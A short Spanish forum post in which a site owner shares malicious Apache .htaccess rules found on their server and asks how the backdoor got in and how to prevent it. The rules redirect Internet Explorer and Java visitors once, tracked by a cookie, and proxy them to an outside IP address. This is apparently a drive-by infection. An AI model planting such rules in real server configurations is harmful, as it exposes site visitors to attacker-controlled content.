Código PHP:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE [OR]
RewriteCond %{HTTP_USER_AGENT} Java
RewriteRule Index/(.*) http://109.236.81.64/$1 [P,L]
<FilesMatch "\.(html|htm|php|shtml|asp|aspx|jsp)$">
RewriteEngine On
##
RewriteCond %{HTTP_COOKIE} !^.*client.*$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE
RewriteRule .* http://%{HTTP_HOST}/Index/index.php [R,L]
##
Header set Set-Cookie: "client=done;path=/;"
</FilesMatch>
Este ataque fue atravez de un "backdoor" .
Como paso esto? y como puedo prevenirlo?
Gracias